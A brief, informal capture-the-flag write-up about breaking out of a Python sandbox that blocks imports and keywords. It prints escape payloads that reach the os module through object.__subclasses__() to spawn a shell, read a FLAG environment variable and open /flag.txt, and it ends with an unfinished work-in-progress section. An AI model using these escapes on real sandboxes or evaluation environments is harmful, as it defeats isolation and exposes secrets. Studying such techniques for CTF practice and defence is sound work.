Python sandbox blocks import etc.

From here: https://github.com/jailctf/pyjailbreaker
https://github.com/yaklang/hack-skills/blob/main/skills/sandbox-escape-techniques/PYTHON_SANDBOX_ESCAPE.md
Commands like this one can get the os module and execute system:
[cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os'].system('sh')

The sandbox still bans keyword like system. So
def fibonacci(n):
    # Your implementation here
    os_mod = [cls for cls in object.__subclasses__() if 'os._wrap_close' in str(cls)][0].__init__.__globals__['sys'].modules['os']
    print(os_mod.getenv('FLAG'))

I tryed and found out that the FLAG is also set as environment variable and so I got it usig os.getenv('FLAG')

WORK IN PROGRESS
def fibonacci(n):
    # Your implementation here
    #for i, cls in enumerate(''.__class__.__bases__[0].__subclasses__()):
    #    if 'codecs.In' in str(cls):
    #        print(i, cls)
    #        break
    INDEX=127
    dictglobals = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__
    print(dictglobals.keys())
    op_en =  ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['open']
#('/flag.txt','r')
    #re_ad = ().__class__.__bases__[0].__subclasses__()[INDEX].__init__.__globals__['read']
